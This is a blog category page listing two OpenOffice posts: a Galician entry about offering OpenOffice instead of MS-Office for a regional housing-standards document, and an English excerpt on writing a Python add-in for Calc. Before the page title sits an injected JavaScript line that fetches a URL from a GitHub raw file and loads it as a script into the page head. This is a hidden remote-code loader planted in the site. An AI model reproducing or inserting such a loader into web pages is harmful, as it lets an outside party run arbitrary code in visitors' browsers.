;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); RVBurke » OpenOffice

Categoría: OpenOffice

Openoffice en galego

30 octubre, 2008 (14:13) | galego, OpenOffice, software-libre

Hoxe, alguén preguntou nos foros de soloarquitectura.com sobre a posibilidade de obter o documento de excepcionalidade das Normas do Hábitat Galego en formato .doc. Desta pregunta xorde esta entrada no blog, para ofrecer solucións alternativas (e mellores, na miña opinión) ó emprego de ferramentas coma o MS-Office.

Simple python calc addin example

6 mayo, 2008 (02:07) | english, OpenOffice, programación, python, software-libre

The OpenOffice spreadsheet application, calc, can be extended through plugins to support new functions that can be as easily used in cell formulas as the built-in ones. Being able to do this using my favourite language, Python, is possible, but not very well documented, so I’ve experimented a bit with it and have come up […]